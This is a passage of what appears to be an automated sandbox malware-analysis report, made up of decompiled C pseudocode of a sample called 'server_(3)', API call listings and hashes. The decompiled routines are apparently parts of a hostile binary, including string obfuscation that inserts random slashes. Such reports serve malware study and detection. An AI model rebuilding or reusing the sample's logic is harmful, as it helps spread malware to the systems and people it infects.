          /* 0x005e6dd2 */												_t109 =  *0x5ea348; // 0x25dd5a8
          /* 0x005e6dd8 */												_t28 = _t109 + 0x5eb0e4; // 0x3050f1ff
          /* 0x005e6de2 */												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
          /* 0x005e6de6 */												if(_t118 >= 0) {
          /* 0x005e6de8 */													_t75 = _v16;
          /* 0x005e6df5 */													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
          /* 0x005e6df9 */													if(_t118 >= 0 && _v12 != 0) {
          /* 0x005e6e01 */														_t79 =  *0x5ea348; // 0x25dd5a8
          /* 0x005e6e06 */														_t33 = _t79 + 0x5eb078; // 0x76006f
          /* 0x005e6e18 */														if(lstrcmpW(_v12, _t33) == 0) {
          /* 0x005e6e1a */															_t83 = _v16;
          /* 0x005e6e20 */															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
          /* 0x005e6e20 */														}
          /* 0x005e6e29 */														 *_t87(_v12);
          /* 0x005e6e29 */													}
          /* 0x005e6e2b */													_t77 = _v16;
          /* 0x005e6e31 */													 *((intOrPtr*)( *_t77 + 8))(_t77);
          /* 0x005e6e31 */												}
          /* 0x005e6e34 */												_t72 = _v8;
          /* 0x005e6e3a */												 *((intOrPtr*)( *_t72 + 8))(_t72);
          /* 0x005e6e3d */												_v40 = _v40 + 1;
          /* 0x005e6e46 */												if(_v40 < _v20) {
          /* 0x00000000 */													continue;
          /* 0x00000000 */												}
          /* 0x00000000 */												goto L16;
          /* 0x005e6e46 */											}
          /* 0x005e6d9a */										}
          /* 0x005e6d94 */									}
          /* 0x005e6d7d */								}
          /* 0x005e6e4c */								L16:
          /* 0x005e6e4c */								_t65 = _v24;
          /* 0x005e6e52 */								 *((intOrPtr*)( *_t65 + 8))(_t65);
          /* 0x005e6e52 */							}
          /* 0x005e6e58 */							 *_t87(_v28);
          /* 0x005e6e58 */						}
          /* 0x005e6e61 */						_t58 = _v32;
          /* 0x005e6e67 */						 *((intOrPtr*)( *_t58 + 8))(_t58);
          /* 0x005e6e67 */					}
          /* 0x005e6d24 */				}
          /* 0x005e6e70 */				return _t118;
                          			}

          APIs
          • SysAllocString.OLEAUT32(005E9284), ref: 005E6D2F
          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 005E6E10
          • SysFreeString.OLEAUT32(00000000), ref: 005E6E29
          • SysFreeString.OLEAUT32(?), ref: 005E6E58
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$Free$Alloclstrcmp
          • String ID:
          • API String ID: 1885612795-0
          • Opcode ID: 6905cd5d8c93982c28a2ca76b20d60f0b27ddfac666e06116f5078d14249ff39
          • Instruction ID: 45552744555ee4adcb65fcbdad52e60be57f60cb3cc03a7056a953797ad4f5cc
          • Opcode Fuzzy Hash: 6905cd5d8c93982c28a2ca76b20d60f0b27ddfac666e06116f5078d14249ff39
          • Instruction Fuzzy Hash: 05518E75D0050AEFCB04DFA8C8889AFBBB9FF88744B144598E915EB260D731AD01CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SysAllocString.OLEAUT32(?), ref: 005E59B8
          • SysFreeString.OLEAUT32(00000000), ref: 005E5A9D
            • Part of subcall function 005E6CDF: SysAllocString.OLEAUT32(005E9284), ref: 005E6D2F
          • SafeArrayDestroy.OLEAUT32(00000000), ref: 005E5AF0
          • SysFreeString.OLEAUT32(00000000), ref: 005E5AFF
            • Part of subcall function 005E77E3: Sleep.KERNEL32(000001F4), ref: 005E782B
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$AllocFree$ArrayDestroySafeSleep
          • String ID:
          • API String ID: 3193056040-0
          • Opcode ID: a0c08c314a35dd9bfea5257c9410a1856f50cf4820b74adcbc8a622d80eab4f6
          • Instruction ID: 324bd6272b7de5d8668a10c7ec17314e9a4767674d9d1951856be9956e1bf0b8
          • Opcode Fuzzy Hash: a0c08c314a35dd9bfea5257c9410a1856f50cf4820b74adcbc8a622d80eab4f6
          • Instruction Fuzzy Hash: 8151C47550064AAFDB05DFA9C888ADEBBB5FFC8705F148528E545DB220EB30ED45CB50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 85%
                          			E005E4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				void _v156;
                          				void _v428;
                          				void* _t55;
                          				unsigned int _t56;
                          				signed int _t66;
                          				signed int _t74;
                          				void* _t76;
                          				signed int _t79;
                          				void* _t81;
                          				void* _t92;
                          				void* _t96;
                          				signed int* _t99;
                          				signed int _t101;
                          				signed int _t103;
                          				void* _t107;

          /* 0x005e4784 */				_t92 = _a12;
          /* 0x005e4790 */				_t101 = __eax;
          /* 0x005e4796 */				_t55 = E005E61EF(_a16, _t92);
          /* 0x005e479b */				_t79 = _t55;
          /* 0x005e479f */				if(_t79 == 0) {
          /* 0x005e4911 */					L18:
          /* 0x005e4915 */					return _t55;
          /* 0x005e4915 */				}
          /* 0x005e47a5 */				_t56 =  *(_t92 + _t79 * 4 - 4);
          /* 0x005e47a9 */				_t81 = 0;
          /* 0x005e47ad */				_t96 = 0x20;
          /* 0x005e47b0 */				if(_t56 == 0) {
          /* 0x005e47bb */					L4:
          /* 0x005e47c1 */					_t97 = _t96 - _t81;
          /* 0x005e47c6 */					_v12 = _t96 - _t81;
          /* 0x005e47c9 */					E005E6725(_t79,  &_v428);
          /* 0x005e47e3 */					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E005E7477(_t101,  &_v428, _a8, _t96 - _t81);
          /* 0x005e47f2 */					E005E7477(_t79,  &_v156, _a12, _t97);
          /* 0x005e47fe */					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
          /* 0x005e4808 */					_t66 = E005E6725(_t101, 0x5ea1d0);
          /* 0x005e480d */					_t103 = _t101 - _t79;
          /* 0x005e480f */					_a8 = _t103;
          /* 0x005e4812 */					if(_t103 < 0) {
          /* 0x005e48c9 */						L17:
          /* 0x005e48cf */						E005E6725(_a16, _a4);
          /* 0x005e48e0 */						E005E7894(_t79,  &_v428, _a4, _t97);
          /* 0x005e48f3 */						memset( &_v428, 0, 0x10c);
          /* 0x005e4909 */						_t55 = memset( &_v156, 0, 0x84);
          /* 0x00000000 */						goto L18;
          /* 0x005e490e */					}
          /* 0x005e481b */					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
          /* 0x005e4822 */					do {
          /* 0x005e4826 */						if(_v8 != 0xffffffff) {
          /* 0x005e482c */							_push(1);
          /* 0x005e482e */							_push(0);
          /* 0x005e4830 */							_push(0);
          /* 0x005e4832 */							_push( *_t99);
          /* 0x005e4834 */							L005E82DA();
          /* 0x005e483e */							_t74 = _t66 +  *(_t99 - 4);
          /* 0x005e4843 */							asm("adc edx, esi");
          /* 0x005e4845 */							_push(0);
          /* 0x005e4847 */							_push(_v8 + 1);
          /* 0x005e4848 */							_push(_t92);
          /* 0x005e4849 */							_push(_t74);
          /* 0x005e484a */							L005E82D4();
          /* 0x005e4851 */							if(_t92 > 0 || _t74 > 0xffffffff) {
          /* 0x005e4858 */								_t74 = _t74 | 0xffffffff;
          /* 0x005e485b */								_v16 = _v16 & 0x00000000;
          /* 0x005e485b */							}
          /* 0x005e4828 */						} else {
          /* 0x005e4828 */							_t74 =  *_t99;
          /* 0x005e4828 */						}
          /* 0x005e4863 */						_t106 = _t107 + _a8 * 4 - 0x1a8;
          /* 0x005e486b */						_a12 = _t74;
          /* 0x005e4877 */						_t76 = E005E5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
          /* 0x005e487c */						while(1) {
          /* 0x005e487c */							 *_t99 =  *_t99 - _t76;
          /* 0x005e4881 */							if( *_t99 != 0) {
          /* 0x00000000 */								goto L14;
          /* 0x00000000 */							}
          /* 0x005e4883 */							L13:
          /* 0x005e4886 */							_t92 =  &_v156;
          /* 0x005e4893 */							if(E005E6E71(_t79, _t92, _t106) < 0) {
          /* 0x00000000 */								break;
          /* 0x00000000 */							}
          /* 0x005e4895 */							L14:
          /* 0x005e4895 */							_a12 = _a12 + 1;
          /* 0x005e48a2 */							_t76 = E005E10A0(_t79,  &_v156, _t106, _t106);
          /* 0x005e487c */							 *_t99 =  *_t99 - _t76;
          /* 0x005e4881 */							if( *_t99 != 0) {
          /* 0x00000000 */								goto L14;
          /* 0x00000000 */							}
          /* 0x00000000 */							goto L13;
          /* 0x005e4881 */						}
          /* 0x005e48ac */						_a8 = _a8 - 1;
          /* 0x005e48af */						_t66 = _a12;
          /* 0x005e48b2 */						_t99 = _t99 - 4;
          /* 0x005e48b9 */						 *(0x5ea1d0 + _a8 * 4) = _t66;
          /* 0x005e48b9 */					} while (_a8 >= 0);
          /* 0x005e48c6 */					_t97 = _v12;
          /* 0x00000000 */					goto L17;
          /* 0x005e48c6 */				}
          /* 0x005e47b2 */				while(_t81 < _t96) {
          /* 0x005e47b6 */					_t81 = _t81 + 1;
          /* 0x005e47b7 */					_t56 = _t56 >> 1;
          /* 0x005e47b9 */					if(_t56 != 0) {
          /* 0x00000000 */						continue;
          /* 0x00000000 */					}
          /* 0x00000000 */					goto L4;
          /* 0x005e47b9 */				}
          /* 0x00000000 */				goto L4;
                          			}

          APIs
          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 005E4834
          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 005E484A
          • memset.NTDLL ref: 005E48F3
          • memset.NTDLL ref: 005E4909
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: memset$_allmul_aulldiv
          • String ID:
          • API String ID: 3041852380-0
          • Opcode ID: bd9e5ec1d8c37d17392c3cef6c1ed2c64564c4150628b5af3ca112daaf4ec872
          • Instruction ID: b61b340228b8c1d52585d633cfa06ae21b6e69bd7f777e39ec854aab2b8a6d58
          • Opcode Fuzzy Hash: bd9e5ec1d8c37d17392c3cef6c1ed2c64564c4150628b5af3ca112daaf4ec872
          • Instruction Fuzzy Hash: EB41F471A00299ABDB189F69CC49BEE7B75FF85310F004569F989A7181EB70AE44CF80
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 87%
                          			E005E49D0(signed int _a4, signed int* _a8) {
                          				void* __ecx;
                          				void* __edi;
                          				signed int _t6;
                          				intOrPtr _t8;
                          				intOrPtr _t12;
                          				short* _t19;
                          				void* _t25;
                          				signed int* _t28;
                          				CHAR* _t30;
                          				long _t31;
                          				intOrPtr* _t32;

          /* 0x005e49d1 */				_t6 =  *0x5ea310; // 0xd448b889
          /* 0x005e49d8 */				_t32 = _a4;
          /* 0x005e49e2 */				_a4 = _t6 ^ 0x109a6410;
          /* 0x005e49e6 */				_t8 =  *0x5ea348; // 0x25dd5a8
          /* 0x005e49ec */				_t3 = _t8 + 0x5eb7b4; // 0x61636f4c
          /* 0x005e49fb */				_t25 = 0;
          /* 0x005e4a02 */				_t30 = E005E74EC(_t3, 1);
          /* 0x005e4a06 */				if(_t30 != 0) {
          /* 0x005e4a18 */					_t25 = CreateEventA(0x5ea34c, 1, 0, _t30);
          /* 0x005e4a1a */					E005E61DA(_t30);
          /* 0x005e4a1a */				}
          /* 0x005e4a1f */				_t12 =  *0x5ea2fc; // 0x2000000a
          /* 0x005e4a26 */				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E005E30D5() != 0) {
          /* 0x005e4a7d */					L12:
          /* 0x005e4a7d */					_t28 = _a8;
          /* 0x005e4a83 */					if(_t28 != 0) {
          /* 0x005e4a85 */						 *_t28 =  *_t28 | 0x00000001;
          /* 0x005e4a85 */					}
          /* 0x005e4a8f */					_t31 = E005E37DF(_t32, 0);
          /* 0x005e4a93 */					if(_t31 == 0 && _t25 != 0) {
          /* 0x005e4aa5 */						_t31 = WaitForSingleObject(_t25, 0x4e20);
          /* 0x005e4aa5 */					}
          /* 0x005e4aa9 */					if(_t28 != 0 && _t31 != 0) {
          /* 0x005e4aaf */						 *_t28 =  *_t28 & 0xfffffffe;
          /* 0x005e4aaf */					}
          /* 0x00000000 */					goto L20;
          /* 0x005e4a3f */				} else {
          /* 0x005e4a44 */					_t19 =  *0x5ea124( *_t32, 0x20);
          /* 0x005e4a4c */					if(_t19 != 0) {
          /* 0x005e4a50 */						 *_t19 = 0;
          /* 0x005e4a54 */						_t19 = _t19 + 2;
          /* 0x005e4a54 */					}
          /* 0x005e4a61 */					_t31 = E005E23C4(0,  *_t32, _t19, 0);
          /* 0x005e4a65 */					if(_t31 == 0) {
          /* 0x005e4a69 */						if(_t25 == 0) {
          /* 0x005e4abe */							L22:
          /* 0x005e4ac4 */							return _t31;
          /* 0x005e4ac4 */						}
          /* 0x005e4a77 */						_t31 = WaitForSingleObject(_t25, 0x4e20);
          /* 0x005e4a7b */						if(_t31 == 0) {
          /* 0x005e4ab2 */							L20:
          /* 0x005e4ab4 */							if(_t25 != 0) {
          /* 0x005e4ab7 */								CloseHandle(_t25);
          /* 0x005e4ab7 */							}
          /* 0x00000000 */							goto L22;
          /* 0x005e4ab4 */						}
          /* 0x005e4a7b */					}
          /* 0x00000000 */					goto L12;
          /* 0x005e4a65 */				}
                          			}

          APIs
            • Part of subcall function 005E74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,02BC9E18,00000000,?,?,43175AC3,00000005,005EA00C,4D283A53,?,?), ref: 005E7522
            • Part of subcall function 005E74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 005E7546
            • Part of subcall function 005E74EC: lstrcat.KERNEL32(00000000,00000000), ref: 005E754E
          • CreateEventA.KERNEL32(005EA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,005E6A95,?,?,?), ref: 005E4A11
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • WaitForSingleObject.KERNEL32(00000000,00004E20,005E6A95,00000000,00000000,?,00000000,?,005E6A95,?,?,?), ref: 005E4A71
          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,005E6A95,?,?,?), ref: 005E4A9F
          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,005E6A95,?,?,?), ref: 005E4AB7
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
          • String ID:
          • API String ID: 73268831-0
          • Opcode ID: 6e8f8af00ba701a611cab67a1667c76272fa16cf6d8ae7ee8a6890babdc1a62a
          • Instruction ID: 6f3bbd97d15c0922a014193331d256806c8c1167dc053c2725cb93cf0bf36ddf
          • Opcode Fuzzy Hash: 6e8f8af00ba701a611cab67a1667c76272fa16cf6d8ae7ee8a6890babdc1a62a
          • Instruction Fuzzy Hash: 6E2106736803D15BC73D9B668C8CA6B7AEBFB98724B050635FDC19B141DB20DC048B58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 39%
          			E005E69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
          				intOrPtr _v12;
          				void* _v16;
          				void* _v28;
          				char _v32;
          				void* __esi;
          				void* _t29;
          				void* _t38;
          				signed int* _t39;
          				void* _t40;
          
          				_t36 = __ecx;
          				_v32 = 0;
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				_v12 = _a4;
          				_t38 = E005E2A3D(__ecx,  &_v32);
          				if(_t38 != 0) {
          					L12:
          					_t39 = _a8;
          					L13:
          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
          						_t23 =  &(_t39[1]);
          						if(_t39[1] != 0) {
          							E005E28B3(_t23);
          						}
          					}
          					return _t38;
          				}
          				if(E005E6ADC(0x40,  &_v16) != 0) {
          					_v16 = 0;
          				}
          				_t40 = CreateEventA(0x5ea34c, 1, 0,  *0x5ea3e4);
          				if(_t40 != 0) {
          					SetEvent(_t40);
          					Sleep(0xbb8);
          					CloseHandle(_t40);
          				}
          				_push( &_v32);
          				if(_a12 == 0) {
          					_t29 = E005E5704(_t36);
          				} else {
          					_push(0);
          					_push(0);
          					_push(0);
          					_push(0);
          					_push(0);
          					_t29 = E005E4C94(_t36);
          				}
          				_t41 = _v16;
          				_t38 = _t29;
          				if(_v16 != 0) {
          					E005E7220(_t41);
          				}
          				if(_t38 != 0) {
          					goto L12;
          				} else {
          					_t39 = _a8;
          					_t38 = E005E49D0( &_v32, _t39);
          					goto L13;
          				}
          			}

          Addresses: 0x005e69e6, 0x005e69f3, 0x005e69f9, 0x005e69fa, 0x005e69fb, 0x005e69fc, 0x005e69fd, 0x005e6a01, 0x005e6a0d, 0x005e6a11, 0x005e6a99, 0x005e6a99, 0x005e6a9c, 0x005e6a9e, 0x005e6aa6, 0x005e6aac, 0x005e6aaf, 0x005e6aaf, 0x005e6aac, 0x005e6aba, 0x005e6aba, 0x005e6a24, 0x005e6a26, 0x005e6a26, 0x005e6a3d, 0x005e6a41, 0x005e6a44, 0x005e6a4f, 0x005e6a56, 0x005e6a56, 0x005e6a5f, 0x005e6a63, 0x005e6a71, 0x005e6a65, 0x005e6a65, 0x005e6a66, 0x005e6a67, 0x005e6a68, 0x005e6a69, 0x005e6a6a, 0x005e6a6a, 0x005e6a76, 0x005e6a79, 0x005e6a7d, 0x005e6a7f, 0x005e6a7f, 0x005e6a86, 0x00000000, 0x005e6a88, 0x005e6a88, 0x005e6a95, 0x00000000, 0x005e6a95

          APIs
          • CreateEventA.KERNEL32(005EA34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 005E6A37
          • SetEvent.KERNEL32(00000000), ref: 005E6A44
          • Sleep.KERNEL32(00000BB8), ref: 005E6A4F
          • CloseHandle.KERNEL32(00000000), ref: 005E6A56
            • Part of subcall function 005E5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vj^,?,?,?,?,?,005E6A76,?), ref: 005E57DE
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
          • String ID:
          • API String ID: 2559942907-0
          • Opcode ID: f67abf8cef2ffc553e6d02c1497d5e73cccdcca310e6ea46137d3b68ca6a9ede
          • Instruction ID: d23bd671d7aa4fb9166d2f23428647db88da21ff55df5ebfb94a6aad6069f3b8
          • Opcode Fuzzy Hash: f67abf8cef2ffc553e6d02c1497d5e73cccdcca310e6ea46137d3b68ca6a9ede
          • Instruction Fuzzy Hash: B8218872D00199EBCB24AFE698898DE7FA9FB543D0B058439FA91B7101D730AD458751
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 78%
          			E005E4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
          				intOrPtr _v8;
          				void* _v12;
          				void* _v16;
          				intOrPtr _t26;
          				intOrPtr* _t28;
          				intOrPtr _t31;
          				intOrPtr* _t32;
          				void* _t39;
          				int _t46;
          				intOrPtr* _t47;
          				int _t48;
          
          				_t47 = __eax;
          				_push( &_v12);
          				_push(__eax);
          				_t39 = 0;
          				_t46 = 0;
          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
          				_v8 = _t26;
          				if(_t26 < 0) {
          					L13:
          					return _v8;
          				}
          				if(_v12 == 0) {
          					Sleep(0xc8);
          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
          				}
          				if(_v8 >= _t39) {
          					_t28 = _v12;
          					if(_t28 != 0) {
          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
          						_v8 = _t31;
          						if(_t31 >= 0) {
          							_t46 = lstrlenW(_v16);
          							if(_t46 != 0) {
          								_t46 = _t46 + 1;
          								_t48 = _t46 + _t46;
          								_t39 = E005E33DC(_t48);
          								if(_t39 == 0) {
          									_v8 = 0x8007000e;
          								} else {
          									memcpy(_t39, _v16, _t48);
          								}
          								__imp__#6(_v16);
          							}
          						}
          						_t32 = _v12;
          						 *((intOrPtr*)( *_t32 + 8))(_t32);
          					}
          					 *_a4 = _t39;
          					 *_a8 = _t46 + _t46;
          				}
          				goto L13;
          			}

          Addresses: 0x005e446d, 0x005e4471, 0x005e4472, 0x005e4473, 0x005e4475, 0x005e4477, 0x005e447a, 0x005e447f, 0x005e4516, 0x005e451d, 0x005e451d, 0x005e4488, 0x005e448f, 0x005e449f, 0x005e449f, 0x005e44a5, 0x005e44a7, 0x005e44ac, 0x005e44b5, 0x005e44bb, 0x005e44c0, 0x005e44cb, 0x005e44cf, 0x005e44d1, 0x005e44d2, 0x005e44db, 0x005e44df, 0x005e44f0, 0x005e44e1, 0x005e44e6, 0x005e44eb, 0x005e44fa, 0x005e44fa, 0x005e44cf, 0x005e4500, 0x005e4506, 0x005e4506, 0x005e450f, 0x005e4514, 0x005e4514, 0x00000000

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeSleepStringlstrlenmemcpy
          • String ID:
          • API String ID: 1198164300-0
          • Opcode ID: 61d44d4dcc048ecfd80d385b239005fcbdc964cf6c81ff0782676389147576bf
          • Instruction ID: 6bfa226c39f25a40d5914fed2e09a80d71888ad926554a83c92da2dba9faccbd
          • Opcode Fuzzy Hash: 61d44d4dcc048ecfd80d385b239005fcbdc964cf6c81ff0782676389147576bf
          • Instruction Fuzzy Hash: FA216075A0024AEFCB05DFA5D88899EBFB4FF88314B10816AE981D7310EB30DA04DF50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 68%
          			E005E2708(unsigned int __eax, void* __ecx) {
          				void* _v8;
          				void* _v12;
          				signed int _t21;
          				signed short _t23;
          				char* _t27;
          				void* _t29;
          				void* _t30;
          				unsigned int _t33;
          				void* _t37;
          				unsigned int _t38;
          				void* _t41;
          				void* _t42;
          				int _t45;
          				void* _t46;
          
          				_t42 = __eax;
          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
          				_t38 = __eax;
          				_t30 = RtlAllocateHeap( *0x5ea2d8, 0, (__eax >> 3) + __eax + 1);
          				_v12 = _t30;
          				if(_t30 != 0) {
          					_v8 = _t42;
          					do {
          						_t33 = 0x18;
          						if(_t38 <= _t33) {
          							_t33 = _t38;
          						}
          						_t21 =  *0x5ea2f0; // 0x4c759564
          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
          						 *0x5ea2f0 = _t23;
          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
          						memcpy(_t30, _v8, _t45);
          						_v8 = _v8 + _t45;
          						_t27 = _t30 + _t45;
          						_t38 = _t38 - _t45;
          						_t46 = _t46 + 0xc;
          						 *_t27 = 0x2f;
          						_t13 = _t27 + 1; // 0x1
          						_t30 = _t13;
          					} while (_t38 > 8);
          					memcpy(_t30, _v8, _t38 + 1);
          				}
          				return _v12;
          			}

          Addresses: 0x005e2710, 0x005e2713, 0x005e2719, 0x005e2731, 0x005e2733, 0x005e2738, 0x005e273a, 0x005e273d, 0x005e273f, 0x005e2742, 0x005e2744, 0x005e2744, 0x005e2746, 0x005e2751, 0x005e2756, 0x005e2767, 0x005e276f, 0x005e2774, 0x005e2777, 0x005e277a, 0x005e277c, 0x005e277f, 0x005e2782, 0x005e2782, 0x005e2785, 0x005e2790, 0x005e2795, 0x005e279f

          APIs
          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,005E6708,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E2713
          • RtlAllocateHeap.NTDLL(00000000,?), ref: 005E272B
          • memcpy.NTDLL(00000000,02BC9600,-00000008,?,?,?,005E6708,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E276F
          • memcpy.NTDLL(00000001,02BC9600,00000001,005E3ECE,00000000,02BC9600), ref: 005E2790
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: memcpy$AllocateHeaplstrlen
          • String ID:
          • API String ID: 1819133394-0
          • Opcode ID: 8b15ab61c9b6137c9c8413d40299fae39ad072be2762521eebe561ba020c11af
          • Instruction ID: db214384094f23144d6c93467c05c198ada0a54cc90a9e1085ab8af511345864
          • Opcode Fuzzy Hash: 8b15ab61c9b6137c9c8413d40299fae39ad072be2762521eebe561ba020c11af
          • Instruction Fuzzy Hash: 10112376A00295ABC7188B6ACC88D9A7FAEEB90360B050166F584AB250E7709E0493A0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E7843(void* __esi) {
          				struct _SECURITY_ATTRIBUTES* _v4;
          				void* _t8;
          				void* _t10;
          
          				_v4 = 0;
          				memset(__esi, 0, 0x38);
          				_t8 = CreateEventA(0, 1, 0, 0);
          				 *(__esi + 0x1c) = _t8;
          				if(_t8 != 0) {
          					_t10 = CreateEventA(0, 1, 1, 0);
          					 *(__esi + 0x20) = _t10;
          					if(_t10 == 0) {
          						CloseHandle( *(__esi + 0x1c));
          					} else {
          						_v4 = 1;
          					}
          				}
          				return _v4;
          			}

          Addresses: 0x005e784d, 0x005e7851, 0x005e7866, 0x005e7868, 0x005e786d, 0x005e7873, 0x005e7875, 0x005e787a, 0x005e7885, 0x005e787c, 0x005e787c, 0x005e787c, 0x005e787a, 0x005e7893

          APIs
          • memset.NTDLL ref: 005E7851
          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 005E7866
